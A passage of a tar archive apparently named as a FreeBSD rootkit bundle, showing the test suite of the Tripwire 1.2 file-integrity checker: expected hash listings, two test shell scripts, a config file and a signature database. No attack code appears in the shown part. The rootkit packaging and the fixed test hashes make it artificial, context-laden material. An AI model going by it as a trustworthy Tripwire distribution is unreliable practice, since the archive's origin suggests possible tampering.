$MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ 0; shift . $MYCHECK echo "=== $ME: PASS ===" echo echo fbsdrootkit-1.2/tripwire-1.2/tests/test0.key100600 764 764 16015 5614757766 16263 0ustar dfdf*** ./testfiles/t_file0 *** sig0: nullsig : 0 sig1: md5 : d41d8cd98f00b204e9800998ecf8427e sig2: snefru : 8617f366566a011837f4fb4ba5bedea2 sig3: crc32 : 00000000 sig4: crc16 : 0000 sig5: md4 : 31d6cfe0d16ae931b73c59d7e0c089c0 sig6: md2 : 8350e5a3e24c153df2275c9f80692773 sig7: sha : da39a3ee5e6b4b0d3255bfef95601890afd80709 sig8: haval : 1bdc556b29ad02ec09af8c66477f2a87 sig9: nullsig : 0 *** ./testfiles/t_file1 *** sig0: nullsig : 0 sig1: md5 : 0cc175b9c0f1b6a831c399e269772661 sig2: snefru : bf5ce540ae51bc50399f96746c5a15bd sig3: crc32 : b73d8601 sig4: crc16 : e8c1 sig5: md4 : bde52cb31de33e46245e05fbdbd6fb24 sig6: md2 : 32ec01ec4a6dac72c0ab96fb34c0b5d1 sig7: sha : 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 sig8: haval : 24d2bc955a219e3e06462c91b555cfa1 sig9: nullsig : 0 *** ./testfiles/t_file10 *** sig0: nullsig : 0 sig1: md5 : ba1f2511fc30423bdbb183fe33f3dd0f sig2: snefru : bc3a50af82bf56d6a64732bc7b050a93 sig3: crc32 : 75152d3d sig4: crc16 : c43b sig5: md4 : 19e6b41091f5eddd2abbe43139481746 sig6: md2 : 9efb894dacb19a345e3519bff3fadd65 sig7: sha : a8fdc205a9f19cc1c7507a60c4f01b13d11d7fd0 sig8: haval : 6508d08fbf578a95661847ffda055627 sig9: nullsig : 0 *** ./testfiles/t_file11 *** sig0: nullsig : 0 sig1: md5 : e7df7cd2ca07f4f1ab415d457a6e1c13 sig2: snefru : c5b8a04985a8eadfb4331a8988752b77 sig3: crc32 : b68e0ba9 sig4: crc16 : b415 sig5: md4 : 37d4546740294870f3ff7dc3ae7f0297 sig6: md2 : ffc70b71eb524609e8e58ae761be4e7b sig7: sha : 1be168ff837f043bde17c0314341c84271047b31 sig8: haval : ce11d80d0ef871d1549f8cea2337c0c4 sig9: nullsig : 0 *** ./testfiles/t_file12 *** sig0: nullsig : 0 sig1: md5 : d577273ff885c3f84dadb8578bb41399 sig2: snefru : d559a2b62f6f44111324f85208723707 sig3: crc32 : 
a3e3626b sig4: crc16 : 38e4 sig5: md4 : b1a45cdad19cb02482323fac9cea9b9f sig6: md2 : 3c84d0028288e38d32199b73c9ee91d3 sig7: sha : 2672275fe0c456fb671e4f417fb2f9892c7573ba sig8: haval : 3f85b9d3b459bc9955ca896c4dc6fb24 sig9: nullsig : 0 *** ./testfiles/t_file13 *** sig0: nullsig : 0 sig1: md5 : f447b20a7fcbf53a5d5be013ea0b15af sig2: snefru : 6cfb5e8f1da02bd167b01e4816686c30 sig3: crc32 : e11da79d sig4: crc16 : 4ca9 sig5: md4 : f1eaa22abcec04a5d3524f00b140d0c2 sig6: md2 : 9e899601601eb0af4d9e9fdf8771c187 sig7: sha : c4f9375f9834b4e7f0a528cc65c055702bf5f24a sig8: haval : b5bc9108d246c166adda8ebd2f73e002 sig9: nullsig : 0 *** ./testfiles/t_file14 *** sig0: nullsig : 0 sig1: md5 : 1b504d3328e16fdf281d1fb9516dd90b sig2: snefru : 29aa48325f275a8a7a01ba1543c54ba5 sig3: crc32 : c952ca62 sig4: crc16 : e91c sig5: md4 : 064984f462b38631d31624c411decfba sig6: md2 : eb95dea75b5c1c004ebd79751079a915 sig7: sha : e017693e4a04a59d0b0f400fe98177fe7ee13cf7 sig8: haval : a0997d012a4e7fafcbce108114809c21 sig9: nullsig : 0 *** ./testfiles/t_file15 *** sig0: nullsig : 0 sig1: md5 : b2cfa4183267af678ea06c7407d4d6d8 sig2: snefru : 6103721ccd8ad565d68e90b0f8906163 sig3: crc32 : a37c1a24 sig4: crc16 : d6fa sig5: md4 : 75afae0262592e6fd97990cda5a9be9a sig6: md2 : 33b61247dc9e2d0931633fdc3b181a88 sig7: sha : 179c94cf45c6e383baf52621687305204cef16f9 sig8: haval : fec312ff60147311bc6991b95484ee89 sig9: nullsig : 0 *** ./testfiles/t_file16 *** sig0: nullsig : 0 sig1: md5 : d50b9edee452966e27baf56d33d83a55 sig2: snefru : 56ab6bb21a7a07892d62cb03c41dde6d sig3: crc32 : 3c343c12 sig4: crc16 : 274b sig5: md4 : d543ef4c579e69601b07088ab7f2e17c sig6: md2 : 104cfc93647951d800bc0f7fc2f8efaa sig7: sha : 3eebeac5c732ee465299ef3212409133aa6378ab sig8: haval : ab66ef0b6a5306d306738be8ecbe0b4b sig9: nullsig : 0 *** ./testfiles/t_file2 *** sig0: nullsig : 0 sig1: md5 : 900150983cd24fb0d6963f7d28e17f72 sig2: snefru : 553d0648928299a0f22a275a02c83b10 sig3: crc32 : b755875d sig4: crc16 : 9738 sig5: md4 : 
a448017aaf21d8525fc10ae87aa6729d sig6: md2 : da853b0d3f88d99b30283a69e6ded6bb sig7: sha : a9993e364706816aba3e25717850c26c9cd0d89d sig8: haval : c79c31129c3fe87e506b46c6913c52ac sig9: nullsig : 0 *** ./testfiles/t_file3 *** sig0: nullsig : 0 sig1: md5 : f96b697d7cb7938d525a2f31aaf161d0 sig2: snefru : 96d6f2f4112c4baf29f653f1594e2d5d sig3: crc32 : 26cb4c69 sig4: crc16 : 3b44 sig5: md4 : d9130a8164549fe818874806e1c7014b sig6: md2 : ab4f496bfb2a530b219ff33031fe06b0 sig7: sha : c12252ceda8be8994d5fa0290a47231c1d16aae3 sig8: haval : 2c574b6b79528a852df8240995fe6a21 sig9: nullsig : 0 *** ./testfiles/t_file4 *** sig0: nullsig : 0 sig1: md5 : c3fcd3d76192e4007dfb496cca67e13b sig2: snefru : 7840148a66b91c219c36f127a0929606 sig3: crc32 : 5e46c857 sig4: crc16 : 9c1d sig5: md4 : d79e1c308aa5bbcdeea8ed63df412da9 sig6: md2 : 4e8ddff3650292ab5a4108c3aa47940b sig7: sha : 32d10c7b8cf96570ca04ce37f2a19d84240d3a89 sig8: haval : 92e8ec9ad7fd209d97e9ce21b50440e9 sig9: nullsig : 0 *** ./testfiles/t_file5 *** sig0: nullsig : 0 sig1: md5 : d174ab98d277d9f5a5611c2c9f419d9f sig2: snefru : 0efd7f93a549f023b79781090458923e sig3: crc32 : fb1e06c8 sig4: crc16 : 57b4 sig5: md4 : 043f8582f241db351ce627e153e7f0e4 sig6: md2 : da33def2a42df13975352846c30338cd sig7: sha : 761c457bf73b14d27e9e9265c46f4b4dda11f940 sig8: haval : 4ae2f37cef9275cce0d73f6a1eb9cdd8 sig9: nullsig : 0 *** ./testfiles/t_file6 *** sig0: nullsig : 0 sig1: md5 : 57edf4a22be3c955ac49da2e2107b67a sig2: snefru : d9204ed80bb8430c0b9c244fe485814a sig3: crc32 : 8c5f4c57 sig4: crc16 : 5ec7 sig5: md4 : e33b4ddc9c38f2199c3e7b164fcc0536 sig6: md2 : d5976f79d83d3a0dc9806c3c66f3efd8 sig7: sha : 50abf5706a150990a08b2c5ea40fa0e585554732 sig8: haval : fe866802ab5df3fa16cdc4547ad9578f sig9: nullsig : 0 *** ./testfiles/t_file7 *** sig0: nullsig : 0 sig1: md5 : 8215ef0796a20bcaaae116d3876c664a sig2: snefru : 96a885f1323c8a94c0413d06a8995eb2 sig3: crc32 : 682cd37b sig4: crc16 : 7d26 sig5: md4 : 4691a9ec81b1a6bd1ab8557240b245c5 sig6: md2 : 
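0dff6b398ad5a62ac8d97566b80c3a7f sig7: sha : 84983e441c3bd26ebaae4aa1f95129e5e54670f1 sig8: haval : 468c2898bdd3b5b6ca9e79cc4eba8c6c sig9: nullsig : 0 *** ./testfiles/t_file8 *** sig0: nullsig : 0 sig1: md5 : b026324c6904b2a9cb4b88d6d61c81d1 sig2: snefru : 44ec420ce99c1f62feb66c53c24ae453 sig3: crc32 : 047f1224 sig4: crc16 : 9795 sig5: md4 : 4d1dee0399f1614e6caf11111d3ce0ad sig6: md2 : 7126e6e44d6bde5b0c04e9a7c14672ea sig7: sha : e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e sig8: haval : 6f35238887e9b7ed5eb6dd3e362b297f sig9: nullsig : 0 *** ./testfiles/t_file9 *** sig0: nullsig : 0 sig1: md5 : 2737b49252e2a4c0fe4c342e92b13285 sig2: snefru : 7182051aa852ef6fba4b6c9c9b79b317 sig3: crc32 : c3470bff sig4: crc16 : a8c4 sig5: md4 : ced1586eb330e55808617232685828ac sig6: md2 : d2c224507e8667ab345f4c734de5a444 sig7: sha : ad552e6dc057d1d825bf49df79d6b98eba846ebe sig8: haval : 915aa6753dd4a0907b93aadcc7891e6e sig9: nullsig : 0 fbsdrootkit-1.2/tripwire-1.2/tests/test0.sh100600 764 764 1305 5502473075 16041 0ustar dfdf
#!/bin/sh
# $Id: test0.sh,v 1.5 1993/12/12 01:39:09 genek Exp $
#
# Runs the signature generator over the files that ./createfiles produces
# and diffs the result against the stored key file.
#
# Arguments:
#   $1  SIGGEN    signature generator command (invoked with -h)
#   $2  TESTDIR   directory passed to ./createfiles and then hashed
#   $3  TEMPFILE  scratch file that receives the generated signatures
#   $4  TEST0KEY  expected signature listing
#
# Exit status: 0 when the two listings match, 1 otherwise.
#
# The diff only shows agreement with $TEST0KEY; a key file altered together
# with the signature routines would still pass, so the key must come from a
# trusted copy of the distribution.

# Refuse to run without all four arguments. An empty TESTDIR would turn the
# cleanup below into "rm -rf /CVS" and the glob into "/*".
if [ $# -lt 4 ] || [ -z "$2" ]
then
    echo "Sorry! You must run this test from the top-level Makefile!"
    exit 1
fi

SIGGEN=$1
TESTDIR=$2
TEMPFILE=$3
TEST0KEY=$4
ME=$0

cat << GHK
=== $ME: DESCRIPTION
This shell script exercises all the signature routines included in the
Tripwire distribution. This suite is run on a series of files created by
the authors of the signature routines.
GHK

echo "=== $ME: BEGIN ==="

./createfiles "$TESTDIR"
rm -rf "$TESTDIR/CVS"

# $SIGGEN stays unquoted so a command passed with its own options still
# splits into words; the path operands are quoted against word splitting.
$SIGGEN -h "$TESTDIR"/* > "$TEMPFILE"

if diff "$TEMPFILE" "$TEST0KEY"
then
    # OKSIGS is the marker file left behind by a successful run.
    touch OKSIGS && rm "$TEMPFILE"
    echo "=== $ME: PASS ==="
    exit 0
else
    echo Signatures do not match! File $TEMPFILE should match $TEST0KEY. Aborting...
    echo "=== $ME: FAIL ==="
    exit 1
fi
fbsdrootkit-1.2/tripwire-1.2/tests/test1.sh100600 764 764 3127 5503641561 16044 0ustar dfdf
#!/bin/sh
# $Id: test1.sh,v 1.12 1993/12/15 17:03:45 genek Exp $
#
# Builds working copies of tw.db_TEST and tw.conf.test in which the recorded
# /tmp/genek/$DIST prefix is replaced by the current source tree, then runs
# ../src/tripwire against those copies and prints what it should report.
#
# Arguments:
#   $1  HOSTNAME  command that is executed to obtain the host name
#   $2  DIST      distribution directory name used in the recorded paths

HOSTNAME=hostname

# check to see if we ran from top-level makefile!
if [ $# -ne 2 ]
then
    echo "Sorry! You must run this test from the top-level Makefile!"
    exit 1
fi

HOSTNAME=$1
DIST=$2
ME=$0

cat << GHK
=== $ME: DESCRIPTION
This shell script tests all the Tripwire signature routines.
Consequently, this test may take awhile to complete, because even the
slowest signature routines are exercised. On a Sequent Symmetry running
16 Mhz Intel 80386s, this test takes over five minutes to complete. This
same test using only the MD5 routines completes in less than 30 seconds.
This test suite will ascertain whether the byte-ordering and
machine-dependent routines are working correctly.
GHK

echo "=== $ME: BEGIN ==="
echo ''
echo creating: ./tw.db_TEST.@
echo creating: ./@tw.config

# $HOSTNAME is run as a command, so it must only ever be supplied by the
# trusted Makefile. HOST is not referenced again in this script.
HOST=`$HOSTNAME`

# Top of the source tree: the current directory with a trailing /tests removed.
CURRPATH=`pwd`
CURRPATH=`echo "$CURRPATH" | sed 's,/tests$,,'`

# Quoting keeps a path with whitespace in one piece. A ',' or '&' in
# CURRPATH would still be interpreted by sed, so build in a path without them.
sed "s,/tmp/genek/$DIST,$CURRPATH," < ./tw.db_TEST > ./tw.db_TEST.@
sed "s,/tmp/genek/$DIST,$CURRPATH," < ./tw.conf.test > ./@tw.config

../src/tripwire -loosedir -c ./@tw.config -d ./tw.db_TEST.@

echo "=== $ME: END ==="
echo ''
echo Tripwire should have only reported:
echo " added: $CURRPATH/tests/@tw.config"
echo " $CURRPATH/tests/tw.db_TEST.@... "
echo " $CURRPATH/tests/OKEXER... "
echo " changed: $CURRPATH/... (maybe some directory sizes...) "
echo " ...and any other files you may have changed!"
echo ''
echo ''
echo removing: ./tests/tw.db_TEST.@
echo removing: @tw.config

# Remove the working copies created above.
rm ./tw.db_TEST.@
rm ./@tw.config
fbsdrootkit-1.2/tripwire-1.2/tests/tw.conf.test100600 764 764 3756 5614763367 16753 0ustar dfdf/tmp/genek/tripwire-1.2 R+0123456789-ugpmci /tmp/genek/tripwire-1.2/tests E !/tmp/genek/tripwire-1.2/databases E !/tmp/genek/tripwire-1.2/tests/databases E !/tmp/genek/tripwire-1.2/src/config.parse.o !/tmp/genek/tripwire-1.2/src/main.o !/tmp/genek/tripwire-1.2/src/list.o !/tmp/genek/tripwire-1.2/src/ignorevec.o !/tmp/genek/tripwire-1.2/src/dbase.build.o !/tmp/genek/tripwire-1.2/src/utils.o !/tmp/genek/tripwire-1.2/src/preen.o !/tmp/genek/tripwire-1.2/src/preen.interp.o !/tmp/genek/tripwire-1.2/src/preen.report.o !/tmp/genek/tripwire-1.2/src/nullsig.o !/tmp/genek/tripwire-1.2/src/config.prim.o !/tmp/genek/tripwire-1.2/src/dbase.update.o !/tmp/genek/tripwire-1.2/src/sigfetch !/tmp/genek/tripwire-1.2/src/siggen !/tmp/genek/tripwire-1.2/src/tripwire !/tmp/genek/tripwire-1.2/src/twconvert !/tmp/genek/tripwire-1.2/src/twconvert.o !/tmp/genek/tripwire-1.2/src/siggen.o !/tmp/genek/tripwire-1.2/src/config.pre.o !/tmp/genek/tripwire-1.2/sigs/crc/crc.o !/tmp/genek/tripwire-1.2/sigs/crc32/crc32.o !/tmp/genek/tripwire-1.2/sigs/md2/md2wrapper.o !/tmp/genek/tripwire-1.2/sigs/md2/md2.o !/tmp/genek/tripwire-1.2/sigs/md4/md4.o !/tmp/genek/tripwire-1.2/sigs/md4/md4wrapper.o !/tmp/genek/tripwire-1.2/sigs/md5/md5.o !/tmp/genek/tripwire-1.2/sigs/md5/md5wrapper.o !/tmp/genek/tripwire-1.2/sigs/snefru/snefru.o !/tmp/genek/tripwire-1.2/sigs/sha/sha.o !/tmp/genek/tripwire-1.2/sigs/sha/shawrapper.o !/tmp/genek/tripwire-1.2/sigs/haval/haval.o !/tmp/genek/tripwire-1.2/sigs/haval/havalwrapper.o !/tmp/genek/tripwire-1.2/aux/types !/tmp/genek/tripwire-1.2/aux/byteorder !/tmp/genek/tripwire-1.2/tests/createfiles !/tmp/genek/tripwire-1.2/tests/testfiles !/tmp/genek/tripwire-1.2/tests/OKSIGS !/tmp/genek/tripwire-1.2/src/config.lex.c !/tmp/genek/tripwire-1.2/src/config.pre.c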
!/tmp/genek/tripwire-1.2/Makefile #/tmp/genek/tripwire-1.2/include/config.h # for show !/tmp/genek/tripwire-1.2/include/byteorder.h !/tmp/genek/tripwire-1.2/include/inode.h !/tmp/genek/tripwire-1.2/src/help.o !/tmp/genek/tripwire-1.2/src/help.c fbsdrootkit-1.2/tripwire-1.2/tests/tw.db_TEST100600 764 764 122020 5630551450 16300 0ustar dfdf# Generated by Tripwire, version 1.2 on Tue Aug 30 01:14:46 1994 @@dbaseversion 4 /tmp/genek/tripwire-1.2 0 00007R 40740 23915 13 856 856 512 0kOivL 0kOiuM 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/aux 0 00007R 40740 8 2 856 856 512 0kOivL 0kOiuM 0kOiut 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/aux/Makefile 0 00007R 100600 43 1 856 856 611 0kOiur 0j3q0u 0kOiur 0 3O5zlRM7cIukKAaSLVZ6Tu 0yq2FWYd:hyjk58V4b5FS7 1CI.tL 000Ai6 3I:dAIaauiuOj7n2.O52.n 0oknp6PHeOOzoADMPo.gA8 FNPbNXIMgUVekJftN8PlRrJnD0Z 2::z.ZgM1KBb46kBR2X.t5 0 /tmp/genek/tripwire-1.2/aux/byteorder.c 0 00007R 100600 50 1 856 856 1074 0kOiur 0k9cpC 0kOiur 0 3dBsRrvMcDM19UIpUY2C4c 2nVoerWItO1Wy2HD9:oixB 0YcAMB 000AUR 3sxZUei8.qlc0Jdlfg60zZ 3xbLr5MA7z7H8PoF042O9L DuYAbrkpr5Fcul4.CPwMGyY47Si 1vMj5ECko4mr2W0Ow0WtiN 0 /tmp/genek/tripwire-1.2/aux/ntohl.h 0 00007R 100600 55 1 856 856 989 0kOiur 0k9cpD 0kOiur 0 0JWQBZaRUN7UMGy3Ayma69 00dtyGTpBDOe5L0lk:HfBv 0os4tB 000Dq4 1htB5qeYG1JoBPPNgDEIoG 0IQuIYFyr.1497y9eCkZa: EkNxkQV5agy11heuxlCjxeDiCEj 249Q.BOTFRk211aVhA6OpK 0 /tmp/genek/tripwire-1.2/aux/twconvert.c 0 00007R 100640 56 1 856 856 2498 0kOiur 0j2:bJ 0kOiur 0 2TTWKZyw2JIzZYlDP8Q3PK 1zUoFWQuKhVTVQX6ProrL: 3sWrFO 000D5P 1NjPt32bhVm0wHdanuiGNe 2x7Hd1LSXZ5yTDun5yIjCh 4FzMCU3xUQ8DNS6RK:iN9.EcP7f 1oFCmWmUxDVgxeAxf96dDj 0 /tmp/genek/tripwire-1.2/aux/types.c 0 00007R 100600 57 1 856 856 1542 0kOiur 0j2:bJ 0kOiur 0 0F3J:OGvd05U.4EXVBIT1V 2tBhK2:Rvmn8LZej4.hake 2eo3sh 0008BY 0UKtU9SlXVBCCndxBUTCOB 2PVn0sZakvB:nLUdjF7636 B1ynSSa9WB6QnqBp8iLP8i2AdcO 2Xvt8Hoq0A1xvb2qwxEubd 0 /tmp/genek/tripwire-1.2/aux/types.sh 0 00007R 100700 58 1 856 856 1209 0kOius 0jQRWI 0kOius 0 
2q5InhdUDGl:D0IGigZ7J6 1:lzT3on5hiLEzcG3TVNW9 3GRGTt 000546 1yOWszmlbvPElE:yNYu6tW 0523AbYOI1BwhtYTNobxjD 8mnYWRAnx8P0txBJFrERMAeSOkq 23uQxLE3ySBRueDD8zPsB: 0 /tmp/genek/tripwire-1.2/COAST.info 0 00007R 100600 23916 1 856 856 2201 0kOius 0kOiqa 0kOius 0 1lf8wSvezLzQUgAztOx:pR 2E31jxi7zt0UX3VWyFEecZ 2PRM31 000FgZ 2WWQkugLNBHj8Bur21c1rY 3RfKbfNePfmfQCIiXih1UR ApavO1CHx9yWEpVYTU0O1zhJcJj 0QSSQcjcmm6ow9ZpeoEC7m 0 /tmp/genek/tripwire-1.2/Changelog 0 00007R 100600 23917 1 856 856 21955 0kOius 0kOiqg 0kOius 0 1IkrqQJg6FOHkZHDGdTzld 1FPEAY6GH6F9fqQKaCxYdo 2P1vFv 0002va 2gIOWOgy7QfGFW8a5wttkI 2d:meWM1HucdYop197Pmg. 5PEm:zFtJp6koX0wBJr7v.gddKx 1me6k0W.J2QCI:bfSGiEcq 0 /tmp/genek/tripwire-1.2/FAQ 0 00007R 100600 23918 1 856 856 4972 0kOius 0kOiqi 0kOius 0 37oCNF074A5kfTmAYHpFRP 2Tc1dw4JTPcqLrPMKVLNt. 03lnK8 000FiM 0fwuJ8a5C5U3VmCwmIXhCK 3P3A49JgEWYJ:0FKQ:fcHZ 9nIWx4ei9DX6k1tKsOR9LVvq9V1 2pa12tJ6G:vyu6uWzJolB3 0 /tmp/genek/tripwire-1.2/INTERNALS 0 00007R 100640 23919 1 856 856 1527 0kOius 0k9d8S 0kOius 0 3wXRa7Isaz9lphjSqizDMI 2CmDJGEiFc6N6CUXcbFwKt 0Gi7Om 000EbL 2KHEojnXumtHB08ohrriaA 0XclhK6fTeZ2DW0oBL4GUA 63a8gSfHtGbOLXMRGeUInvtbu5W 0C6h.yW5jdB5WwkD2wTybJ 0 /tmp/genek/tripwire-1.2/Ported 0 00007R 100600 23921 1 856 856 11406 0kOius 0kG6G5 0kOius 0 2KT.ha89wKxjqhSRwVNAui 0fwYdkS8IrdOR4Ojb3aUlJ 1e9Xmo 000Exr 1h9eJXjNjBkT2uoPnFHxLN 3X:WYzZLh5ya3KNHoxn4IH COE3thzK.GjqBsKK42fxZcEzw6V 0SR0YojeT.EDDgxOUKDjKP 0 /tmp/genek/tripwire-1.2/README 0 00007R 100600 23922 1 856 856 38531 0kOius 0kNQPO 0kOius 0 0mznj8v9cqu7vnUxtW6JFA 2Y9Gc9S2wxqSDTu3v9yOpH 3Lo0ut 000F:Y 2vo6smNinbvcMx7b406qMk 1U8i6cSpM8xnh9hUC7vobg 1zruqOlZVXSHD628ZR11NcFfWUd 2y20P8vjzEx7zinuXijS5s 0 /tmp/genek/tripwire-1.2/README.FIRST 0 00007R 100640 23923 1 856 856 1262 0kOius 0kOiqj 0kOius 0 36pYby7KUfZZ:iRq0empQf 2ztN8:up0u2MNLM:3zQSsQ 2yvSMt 000FNL 0DCaIElD2LSr6Rqj6vsZI5 2uyQ:0O4mU1U6DyqQ1c1pR 6bA5y:BMTBTsFYg:LQsdfLpDk9B 3mw1Qks1O8vf8h3Ru87cHf 0 /tmp/genek/tripwire-1.2/TODO 0 00007R 100600 23924 1 856 856 2610 0kOiut 
0kA8q6 0kOiut 0 1A16JteinCfbeyx6goApO7 0:Z.tQcZPSeh:8:lrHMpVw 39Z0R. 000Dp6 3Nc8QOlMamre3s64lZhf9f 3lpYh0A5C0LS5gecJcq6JN AfJM.1m9JVxPrZ5fLWlEQMDVJld 1FZjMQmMuZcSVzFjGtVlal 0 /tmp/genek/tripwire-1.2/WHATSNEW 0 00007R 100640 23925 1 856 856 14340 0kOiut 0kOiqk 0kOiut 0 0P8dLYBouWUvxGOjO3cFSN 0aHfuVzZUAqa8cjXKeHWxI 0UhH5J 00058x 1kYqLY0CZfqJN2tn:1PcPy 3esEZJjqEU5h91UzYZgIT: 5SgGofUPuwVTR:iNE8x4g04RUwf 2YEMNhw:VRQ5:tB02K3jF: 0 /tmp/genek/tripwire-1.2/configs 0 00007R 40740 25383 2 856 856 1536 0kOivL 0kOiuN 0kOiu. 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/configs/Makefile.xenix 0 00007R 100600 25388 1 856 856 5276 0kOiut 0iSmyN 0kOiut 0 2Qj4d5epUV5OKtvDvc.bXv 2qkyPjQ62dO9QSGL5Thmvj 2s77O3 000BWn 2NtugojWtpVWUhsS9tpnEX 3JQvhW8Zj6W0Pf66zZLqvB DN4OLbpgn2nXCXT8jCI4BxXhcAu 0wHf7UiZ37WP53EZq6UCL1 0 /tmp/genek/tripwire-1.2/configs/conf-3b2g.h 0 00007R 100600 25390 1 856 856 1116 0kOiut 0iSmyO 0kOiut 0 3XCk2MZPegr8iG1YI5YRgv 0QmQYCPVrvjLJoH5cuJ1ui 0Ukhfm 0001XM 17cVEkyYEiyw9d4laTPNdr 11iosZ7VqfVs:3H9ez466e CMgo9oyWMG2ojReINnUjzPuJsrC 3TwWk8JRwNMICRdyf:t9zq 0 /tmp/genek/tripwire-1.2/configs/conf-3b2gr.h 0 00007R 100600 25391 1 856 856 976 0kOiut 0iSmyP 0kOiut 0 3WKSk2zlyFOr.o9gwpDtos 2XtarjzpoY4UCu0moqv9W4 31SMxr 000AOA 0Vj6k.VctvuiQ.JVzj5O5W 1qbSxhxjWPapsv7:18tjEx 7bXZvd4J8pkSg.Qb.UpUg4F1KOE 2DVmGHymmMihPxqJxUFrBN 0 /tmp/genek/tripwire-1.2/configs/conf-aix.h 0 00007R 100600 25392 1 856 856 983 0kOiut 0iSmyQ 0kOiut 0 0CvjO6sY6.oYRUSCoDX:po 1IUXSvDHpqzfiJK7uPNWEM 0JYuOu 000Bc3 0IImCYxDxYrtqJEHB0ZzOA 2S8Ele40glroZJUp6G2JhD E0QBx6OUSntEYptTQtQSr1M5VB1 21gL:xMilH.kY5lHGUsQxl 0 /tmp/genek/tripwire-1.2/configs/conf-apollo.h 0 00007R 100640 25393 1 856 856 1113 0kOiut 0jQRWL 0kOiut 0 1XkmTJgRHtmNkmfsP3luha 0ZCpnsDff24QD4dQllbeZC 2jOD9a 000B.j 1zUK8Emnqy0yIPMjjg8ivC 0JNbL1cwhKnelzdQIRvSsv 7genmLmeknRaSvFtTZDX6QuwgVx 1MAbFwBItUVIMWRrp9u1kg 0 /tmp/genek/tripwire-1.2/configs/conf-aux3.h 0 00007R 100600 25394 1 856 856 1012 0kOiut 0iSmyR 0kOiut 0 289vm8UbTVEXN71uduwNwj 
17Kq.wQhnRnbHDdAfhlsrv 1OTwB: 000Fqt 1YuV9RVzxEDEf6z.034e:6 1xMKNcE7VMtPmDyozX8RWQ DHcofGW3VFvUXfopoPCnKX4nWAC 1BT74LMPegFNk:jpmoWD5W 0 /tmp/genek/tripwire-1.2/configs/conf-bsd.h 0 00007R 100600 25396 1 856 856 867 0kOiuu 0iSmyS 0kOiuu 0 0Vr:GIRQbbzzqpHdFdk83q 1AyJpbfpoJYbOO5hTiitiY 2lChiv 000BeT 1VR4situOKcmXpjiIpwDFV 3y1qwNNkWUMUbX96bIpm5m 4b2kEnsXe1x4WAOzEvIUANAsn0k 3w5VD7msq:v0wJxRfvPzNu 0 /tmp/genek/tripwire-1.2/configs/conf-bsdi.h 0 00007R 100600 25397 1 856 856 927 0kOiuu 0kG6GC 0kOiuu 0 3auV:gC2G1tIaUnhMIfwuB 3aKB08RwpOPCpVN5eja8j. 0nyQTZ 00016O 1qX.xF.KMDyEe22Jb679hr 1tu7i8N3rniQgTgoQ022dV 1dNKKc3caw.fpqA.2hu2aeYNLn5 2r8tAVDXUncPSV1.wxDavE 0 /tmp/genek/tripwire-1.2/configs/conf-convex.h 0 00007R 100600 25398 1 856 856 959 0kOiuu 0iSmyT 0kOiuu 0 17Pl9GseszGTIr39hGZ:7c 1tD9a8HhoM2T6MZNhAhu94 3MCbdC 0007pp 1HgXSYhXm81NfplNe:QgFy 21M7u3I5yyHS5aRvL4Ker: CmOjlN6mU2ZZlsG7vP8sCl681yR 1XnuF:SqSmASzlpjjQBy4w 0 /tmp/genek/tripwire-1.2/configs/conf-dynix.h 0 00007R 100600 25399 1 856 856 871 0kOiuu 0iSmyU 0kOiuu 0 1RsSW:qh649ETvtGWBUUu6 2rw2tQBhmH3Q2VOJ.j1mrE 09XEx: 0000n0 3ox1vsBt5RqHi8U7ttspyx 3zW9g4R5bQzc:eWlVQdN69 1xzK7riWrteGJaCSaL4Nr6WZdUE 2IO1PmHYiYlmOfAcDK3wBt 0 /tmp/genek/tripwire-1.2/configs/conf-epix.h 0 00007R 100600 25400 1 856 856 842 0kOiuu 0iSmyV 0kOiuu 0 1VIoE2OODD.dOFw4ac.ukX 1rbhJCqJHUD9JiYi5sPzpg 3E7ce5 0002dM 0YGBjjaPNwP3S3mhpn0Uhm 1i0N:kP52io1cmuJk.RH90 9hTRrKXO6WUV.fJoZBaUfEyJ3Zh 1VfcvMPuHmwFmL4iCxxoY8 0 /tmp/genek/tripwire-1.2/configs/conf-hpux.h 0 00007R 100600 25401 1 856 856 1255 0kOiuu 0kA6:v 0kOiuu 0 3msF:::zpEV9FMwjrsIHSE 2lr9YTPMgNEZMOnvS1epWj 08Lv4X 000EeZ 2vEtkrSMUCvlx689bAm1yX 1z7XOATUKXYoQRRfhWNGgX AE7NsHmnR1Q.1qAM.XPUKTIJ.E1 2nh:J3cxK:FwDuECnOO:Ot 0 /tmp/genek/tripwire-1.2/configs/conf-irix4.h 0 00007R 100600 25402 1 856 856 949 0kOiuu 0iSmyX 0kOiuu 0 0WzvWmECfMz2nO7IRGFEYv 3XhWMWvukLMe:ZFxvIneOq 1y8enP 000B9A 32ip4AjRO9DMjxqHq3r0h4 3WgSD.2rOwSqoYOSppFsKS 5F8UHT3WHBtsg2vCWcCyyeBqyrM 3X3Msmq4FteVawjltJRYdx 0 
/tmp/genek/tripwire-1.2/configs/conf-linux.h 0 00007R 100600 25403 1 856 856 888 0kOiuu 0kBmzs 0kOiuu 0 0quXVAfkkleBxPFjqPm5Au 0DYTBlIb7mj33AMZCJUvyT 2aGizl 0008h8 2lXyPKAE:jD4064Kcquwj4 2LVDQD:ZpQyyxtJZvhzhgl ESbrYjrWYJYqXBkT1sRpXfZA5m5 3ca0FYt1RSB4T8Yi83mAM. 0 /tmp/genek/tripwire-1.2/configs/conf-mach.h 0 00007R 100600 25404 1 856 856 1117 0kOiuu 0iSmyY 0kOiuu 0 17FIel8nxOdg7YppwE57yO 3ar0F3v6n3l4OSazKK0rpI 2p0QLN 0002fT 2WbAo3Yg2FFjoxyF6kBND1 12CvCrmgtSOPHUgm7qinUx 8UKkJeI7nltMeCVial24GV0pnUe 0tLYhr2f55soU8wXipGsow 0 /tmp/genek/tripwire-1.2/configs/conf-motoR3.h 0 00007R 100600 25405 1 856 856 1178 0kOiuu 0k9cpI 0kOiuu 0 3YtaeCqu0aP4EGLjQV8KF6 1RX2bpmdPGiRGrkyKXZD9: 0NlEUi 000FES 0IS3YEyKAq.GMrFqucozdD 0.n8T1Zif2a61oxviK2ULe 3g5bPhZSRZOxAs3ANRDuLnYZTVe 3UJIuhJZ8Q3GHMPJQWNIAl 0 